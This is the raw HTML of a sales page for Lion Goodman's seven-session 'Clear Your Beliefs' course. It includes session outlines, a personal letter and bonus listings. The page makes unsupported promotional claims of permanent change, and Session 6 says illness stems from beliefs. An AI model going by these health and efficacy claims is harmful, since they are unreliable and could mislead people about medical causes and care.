easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 